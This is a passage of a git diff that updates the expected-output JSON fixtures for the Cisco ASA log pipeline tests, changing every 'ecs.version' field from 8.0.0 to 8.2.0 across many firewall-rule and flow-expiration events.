 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -8737,7 +8737,7 @@
 "port": 1277
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -8820,7 +8820,7 @@
 "port": 8283
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -8902,7 +8902,7 @@
 "port": 1279
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -8981,7 +8981,7 @@
 "port": 1278
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -9065,7 +9065,7 @@
 "port": 1279
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -9148,7 +9148,7 @@
 "port": 8284
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -9230,7 +9230,7 @@
 "port": 1280
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -9309,7 +9309,7 @@
 "port": 1280
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -9392,7 +9392,7 @@
 "port": 8285
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -9474,7 +9474,7 @@
 "port": 1281
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -9552,7 +9552,7 @@
 "port": 8286
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -9634,7 +9634,7 @@
 "port": 1282
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -9712,7 +9712,7 @@
 "port": 8287
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -9794,7 +9794,7 @@
 "port": 1283
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -9872,7 +9872,7 @@
 "port": 8288
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -9954,7 +9954,7 @@
 "port": 1284
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -10033,7 +10033,7 @@
 "port": 1281
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -10117,7 +10117,7 @@
 "port": 1282
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -10201,7 +10201,7 @@
 "port": 1283
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -10284,7 +10284,7 @@
 "port": 8289
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -10366,7 +10366,7 @@
 "port": 1285
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -10444,7 +10444,7 @@
 "port": 8290
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -10526,7 +10526,7 @@
 "port": 1286
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -10605,7 +10605,7 @@
 "port": 1284
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -10688,7 +10688,7 @@
 "port": 8291
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -10770,7 +10770,7 @@
 "port": 1287
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -10849,7 +10849,7 @@
 "port": 1285
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -10933,7 +10933,7 @@
 "port": 1286
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -11021,7 +11021,7 @@
 "port": 56132
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -11099,7 +11099,7 @@
 "port": 8292
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -11181,7 +11181,7 @@
 "port": 1288
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -11260,7 +11260,7 @@
 "port": 56132
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -11347,7 +11347,7 @@
 "port": 56132
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -11426,7 +11426,7 @@
 "port": 56132
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -11508,7 +11508,7 @@
 "port": 8293
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -11590,7 +11590,7 @@
 "port": 1289
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -11669,7 +11669,7 @@
 "port": 1288
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -11753,7 +11753,7 @@
 "port": 1287
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -11841,7 +11841,7 @@
 "port": 56132
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -11920,7 +11920,7 @@
 "port": 56132
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -12002,7 +12002,7 @@
 "port": 8294
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -12084,7 +12084,7 @@
 "port": 1290
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -12163,7 +12163,7 @@
 "port": 68
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -12237,7 +12237,7 @@
 "asa": {}
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -12296,7 +12296,7 @@
 "port": 56132
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -12379,7 +12379,7 @@
 "port": 56132
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -12458,7 +12458,7 @@
 "port": 56132
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -12545,7 +12545,7 @@
 "port": 56132
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -12624,7 +12624,7 @@
 "port": 56132
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -12707,7 +12707,7 @@
 "port": 56132
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -12794,7 +12794,7 @@
 "port": 56132
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -12873,7 +12873,7 @@
 "port": 56132
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -12955,7 +12955,7 @@
 "port": 8295
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -13037,7 +13037,7 @@
 "port": 1291
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -13120,7 +13120,7 @@
 "port": 56132
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -13199,7 +13199,7 @@
 "port": 56132
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -13281,7 +13281,7 @@
 "port": 8296
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -13363,7 +13363,7 @@
 "port": 1292
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -13441,7 +13441,7 @@
 "port": 8297
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -13523,7 +13523,7 @@
 "port": 1293
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -13601,7 +13601,7 @@
 "port": 8298
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -13683,7 +13683,7 @@
 "port": 1294
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -13762,7 +13762,7 @@
 "port": 1293
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -13845,7 +13845,7 @@
 "port": 8299
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -13927,7 +13927,7 @@
 "port": 1295
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -14005,7 +14005,7 @@
 "port": 8300
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -14087,7 +14087,7 @@
 "port": 1296
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -14166,7 +14166,7 @@
 "port": 1294
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -14250,7 +14250,7 @@
 "port": 1295
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -14334,7 +14334,7 @@
 "port": 1296
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -14417,7 +14417,7 @@
 "port": 8301
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -14499,7 +14499,7 @@
 "port": 1297
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -14577,7 +14577,7 @@
 "port": 8302
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -14659,7 +14659,7 @@
 "port": 1298
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -14742,7 +14742,7 @@
 "port": 56132
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -14821,7 +14821,7 @@
 "port": 56132
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -14904,7 +14904,7 @@
 "port": 1297
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -14987,7 +14987,7 @@
 "port": 8303
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -15069,7 +15069,7 @@
 "port": 1299
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -15147,7 +15147,7 @@
 "port": 8304
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -15229,7 +15229,7 @@
 "port": 1300
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -15308,7 +15308,7 @@
 "port": 1298
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -15392,7 +15392,7 @@
 "port": 1300
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -15475,7 +15475,7 @@
 "port": 8305
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -15557,7 +15557,7 @@
 "port": 1301
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -15635,7 +15635,7 @@
 "port": 8306
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -15717,7 +15717,7 @@
 "port": 1302
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -15787,7 +15787,7 @@
 "asa": {}
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -15833,7 +15833,7 @@
 "asa": {}
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -15879,7 +15879,7 @@
 "asa": {}
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -15925,7 +15925,7 @@
 "asa": {}
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -15971,7 +15971,7 @@
 "asa": {}
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -16017,7 +16017,7 @@
 "asa": {}
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -16063,7 +16063,7 @@
 "asa": {}
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -16109,7 +16109,7 @@
 "asa": {}
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -16155,7 +16155,7 @@
 "asa": {}
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -16201,7 +16201,7 @@
 "asa": {}
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -16247,7 +16247,7 @@
 "asa": {}
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -16293,7 +16293,7 @@
 "asa": {}
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -16339,7 +16339,7 @@
 "asa": {}
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -16385,7 +16385,7 @@
 "asa": {}
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -16431,7 +16431,7 @@
 "asa": {}
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -16485,7 +16485,7 @@
 "port": 8308
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -16567,7 +16567,7 @@
 "port": 1304
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -16637,7 +16637,7 @@
 "asa": {}
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -16683,7 +16683,7 @@
 "asa": {}
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -16742,7 +16742,7 @@
 "port": 56132
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -16825,7 +16825,7 @@
 "port": 56132
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -16904,7 +16904,7 @@
 "port": 56132
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -16987,7 +16987,7 @@
 "port": 56132
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -17069,7 +17069,7 @@
 "port": 8309
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -17151,7 +17151,7 @@
 "port": 1305
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -17221,7 +17221,7 @@
 "asa": {}
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -17267,7 +17267,7 @@
 "asa": {}
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -17313,7 +17313,7 @@
 "asa": {}
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -17359,7 +17359,7 @@
 "asa": {}
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -17405,7 +17405,7 @@
 "asa": {}
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -17451,7 +17451,7 @@
 "asa": {}
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -17497,7 +17497,7 @@
 "asa": {}
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -17552,7 +17552,7 @@
 "port": 1305
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -17636,7 +17636,7 @@
 "port": 8309
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -17716,7 +17716,7 @@
 "port": 8309
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -17796,7 +17796,7 @@
 "port": 8309
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -17875,7 +17875,7 @@
 "port": 8310
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -17957,7 +17957,7 @@
 "port": 1306
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -18036,7 +18036,7 @@
 "port": 8309
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -18116,7 +18116,7 @@
 "port": 8309
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -18196,7 +18196,7 @@
 "port": 8309
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -18276,7 +18276,7 @@
 "port": 8309
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -18356,7 +18356,7 @@
 "port": 8309
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -18436,7 +18436,7 @@
 "port": 8309
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -18516,7 +18516,7 @@
 "port": 8309
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -18596,7 +18596,7 @@
 "port": 8309
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -18676,7 +18676,7 @@
 "port": 8309
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -18756,7 +18756,7 @@
 "port": 8309
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -18836,7 +18836,7 @@
 "port": 8309
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -18916,7 +18916,7 @@
 "port": 8309
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -18996,7 +18996,7 @@
 "port": 8309
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -19076,7 +19076,7 @@
 "port": 8309
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -19156,7 +19156,7 @@
 "port": 8309
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -19236,7 +19236,7 @@
 "port": 8309
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -19316,7 +19316,7 @@
 "port": 8309
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -19396,7 +19396,7 @@
 "port": 8309
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -19476,7 +19476,7 @@
 "port": 8309
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -19556,7 +19556,7 @@
 "port": 8309
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -19636,7 +19636,7 @@
 "port": 8309
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -19716,7 +19716,7 @@
 "port": 8309
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -19796,7 +19796,7 @@
 "port": 8309
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -19876,7 +19876,7 @@
 "port": 8309
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -19956,7 +19956,7 @@
 "port": 8309
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -20036,7 +20036,7 @@
 "port": 8309
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -20116,7 +20116,7 @@
 "port": 8309
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -20196,7 +20196,7 @@
 "port": 8309
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -20276,7 +20276,7 @@
 "port": 8309
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -20356,7 +20356,7 @@
 "port": 8309
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -20436,7 +20436,7 @@
 "port": 8309
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -20516,7 +20516,7 @@
 "port": 8309
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -20596,7 +20596,7 @@
 "port": 8309
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-dap-records.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-dap-records.log-expected.json
index 9bafdea0fef..238a4358f76 100644
--- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-dap-records.log-expected.json
+++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-dap-records.log-expected.json
@@ -12,7 +12,7 @@
 }
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json
index d6d086becf4..f8b630f2bd3 100644
--- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json
+++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json
@@ -6,7 +6,7 @@
 "asa": {}
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -52,7 +52,7 @@
 "asa": {}
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -102,7 +102,7 @@
 "port": 443
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-hostnames.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-hostnames.log-expected.json
index db6772d1dcb..3e189d3d992 100644
--- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-hostnames.log-expected.json
+++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-hostnames.log-expected.json
@@ -11,7 +11,7 @@
 "domain": "target.destination.hostname.local"
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -77,7 +77,7 @@
 "ip": "192.168.2.15"
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json
index 2e7240675dc..ee56351f3c9 100644
--- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json
+++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json
@@ -27,7 +27,7 @@
 "port": 53
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -100,7 +100,7 @@
 "ip": "172.24.177.29"
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -171,7 +171,7 @@
 "port": 80
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json
